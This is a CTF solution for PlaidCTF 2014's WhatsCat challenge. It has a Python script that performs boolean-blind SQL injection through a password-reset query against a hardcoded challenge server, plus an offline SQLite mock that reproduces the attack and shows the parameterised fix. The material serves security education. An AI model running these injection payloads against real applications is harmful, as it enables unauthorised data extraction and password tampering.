PPP's WhatsCat Challenge Exploit by @ngocdh

huyngoc, Apr 13th, 2014
# PPP's WhatsCat Challenge Exploit by @ngocdh
# http://play.plaidctf.com/files/whatscat-59b6f6c9b192457fa3e7d2253c8b24c9.tar.bz2
#
# Step 1 : Register with username "hn"
# Step 2 : Register with username "hn' and 21=(select length(flag) from flag)#"
# Step 3 : Reset password of the 2nd user
# Step 4 : Log in with username hn and the original password. If the password is
#          invalid, the reset hit user "hn" instead of the 2nd user, so the injected
#          condition was true (21 = length(flag)).
#
# The flag table/column and length were found manually.
# This code extracts only the flag: a boolean-based blind injection through the
# password-reset query, one character per 8 requests (binary search on its ASCII value).

import random
import string
import urllib.parse
import urllib.request

URL = "http://54.196.116.77/index.php?page=login"


def idgen(size=6, chars=string.ascii_uppercase + string.digits):
    # Fresh victim account for every probe, so an earlier reset never poisons a later check.
    return ''.join(random.choice(chars) for _ in range(size))


def post(fields):
    body = urllib.parse.urlencode(fields).encode()
    return urllib.request.urlopen(URL, body).read().decode(errors="replace")


def check(pos, d, u):
    # Returns 1 if ascii(substr(flag, pos, 1)) is between d and u inclusive, else 0.
    uid = idgen() + "hn"
    query = (uid + "' and (select ascii(substr(flag," + str(pos) + ",1)) from flag)"
             " between " + str(d) + " and " + str(u) + "#")

    post({"name": uid, "pass": "hn", "email": "hn", "register": "Register"})
    post({"name": query, "pass": "hn", "email": "hn", "register": "Register"})
    post({"name": query, "reset": "Forgot Password", "pass": "", "email": ""})
    c = post({"name": uid, "pass": "hn", "login": "Login", "email": ""})

    if "Welcome back" in c and "invalid" not in c:
        return 0   # login still works: the reset missed uid, condition was false
    return 1       # uid's password was reset: condition was true


res = ""
for i in range(1, 22):
    # Binary search over 0..255: 8 probes pin down one character.
    p = 0
    q = 255
    for _ in range(8):
        n = (p + q) // 2
        if check(i, p, n):
            q = n
        else:
            p = n + 1
    res += chr(p)
    print(res)
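The four steps above form a boolean oracle: the reset query's WHERE clause is built from the submitted username, so a name of the form "X' and (cond)#" resets X's password exactly when cond is true, and a failed login for X leaks that bit. The following is an added example, not the paste's code and not the challenge's PHP: it models that behaviour in an in-memory SQLite database and runs the same bisection against it offline. Everything about the app is assumed (parameterised registration and login, a reset that first checks the account exists and then splices the name into the UPDATE), the flag is constructed, and because the mock is SQLite rather than MySQL the payload ends in "-- " instead of "#" and uses unicode() in place of ascii(). It goes slightly beyond the paste by also bisecting length(flag) with the same oracle (the paste found the length by hand) and by showing the parameterised reset that closes the hole.

```python
import itertools
import random
import sqlite3
import string

# Constructed flag for this offline demo; not the real PlaidCTF flag.
DEMO_FLAG = "flag{demo_whatscat}"

_seq = itertools.count()


class WhatsCatMock:
    """Assumed stand-in for the challenge app, on SQLite instead of MySQL.
    Registration and login are parameterised; the password-reset UPDATE
    concatenates the submitted username, the injection point the steps rely on."""

    def __init__(self, flag=DEMO_FLAG, vulnerable=True):
        self.vulnerable = vulnerable
        self.resets = 0
        self.db = sqlite3.connect(":memory:")
        self.db.executescript(
            "CREATE TABLE users(name TEXT PRIMARY KEY, pass TEXT, email TEXT);"
            "CREATE TABLE flag(flag TEXT);"
        )
        self.db.execute("INSERT INTO flag VALUES (?)", (flag,))

    def register(self, name, password, email):
        self.db.execute("INSERT OR IGNORE INTO users VALUES (?, ?, ?)",
                        (name, password, email))

    def reset(self, name):
        # Only existing accounts can be reset: that is why step 2 registers
        # the payload as a username before step 3 resets it.
        if self.db.execute("SELECT 1 FROM users WHERE name = ?", (name,)).fetchone() is None:
            return False
        self.resets += 1
        new_pw = "".join(random.choice(string.ascii_letters) for _ in range(12))
        if self.vulnerable:
            # VULNERABLE (assumed): the name is spliced into the WHERE clause, so
            # "X' and (cond)-- " rewrites X's password whenever cond is true.
            self.db.execute(f"UPDATE users SET pass = '{new_pw}' WHERE name = '{name}'")
        else:
            # Hardened form: bound parameter, the payload name only resets itself.
            self.db.execute("UPDATE users SET pass = ? WHERE name = ?", (new_pw, name))
        return True

    def login(self, name, password):
        row = self.db.execute("SELECT 1 FROM users WHERE name = ? AND pass = ?",
                              (name, password)).fetchone()
        return row is not None


def oracle(app, cond):
    """Steps 1-4 of the write-up as one boolean query: True iff `cond` held."""
    victim = f"u{next(_seq)}hn"             # fresh account per probe (the paste uses a random prefix)
    app.register(victim, "hn", "hn")
    payload = f"{victim}' and ({cond})-- "  # SQLite line comment; MySQL would take '#'
    app.register(payload, "hn", "hn")
    app.reset(payload)
    return not app.login(victim, "hn")      # password gone => the condition was true


def bisect_int(app, expr, lo, hi):
    """Binary-search the integer value of the SQL scalar `expr` within [lo, hi]."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(app, f"({expr}) between {lo} and {mid}"):
            hi = mid
        else:
            lo = mid + 1
    return lo


def flag_length(app, max_len=64):
    return bisect_int(app, "select length(flag) from flag", 0, max_len)


def extract_flag(app):
    n = flag_length(app)
    # unicode() is SQLite's counterpart of MySQL's ascii()
    return "".join(
        chr(bisect_int(app, f"select unicode(substr(flag, {i}, 1)) from flag", 0, 255))
        for i in range(1, n + 1)
    )


if __name__ == "__main__":
    app = WhatsCatMock()
    print(extract_flag(app), "after", app.resets, "reset requests")
```

Running the hardened mock (`WhatsCatMock(vulnerable=False)`) makes the oracle return False for every condition, because the bound parameter turns the whole payload back into an ordinary username: the reset then only touches the payload account, and the victim's login keeps working.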